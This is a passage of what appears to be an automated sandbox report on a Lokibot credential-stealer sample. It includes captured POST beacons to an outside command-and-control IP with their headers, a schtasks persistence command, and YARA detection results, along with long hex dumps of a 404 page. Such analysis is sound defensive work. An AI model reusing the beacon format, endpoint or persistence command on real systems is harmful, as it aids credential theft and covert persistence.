65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.44973963.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:13.182091951 CEST1374OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 163
                    Connection: close
                    Jun 22, 2021 18:23:14.000350952 CEST1388INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.44974163.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:14.320616007 CEST1400OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 163
                    Connection: close
                    Jun 22, 2021 18:23:15.133425951 CEST1414INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:18:23:03
                    Start date:22/06/2021
                    Path:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\user\Desktop\2CW1YLhNIS.exe'
                    Imagebase:0x8f0000
                    File size:1219072 bytes
                    MD5 hash:76AFCE42F708E6A32DC9D0E52F9F0336
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:18:23:07
                    Start date:22/06/2021
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                    Imagebase:0xcb0000
                    File size:185856 bytes
                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:23:07
                    Start date:22/06/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff724c50000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:23:08
                    Start date:22/06/2021
                    Path:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Imagebase:0xc90000
                    File size:1219072 bytes
                    MD5 hash:76AFCE42F708E6A32DC9D0E52F9F0336
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis

                    Reset < >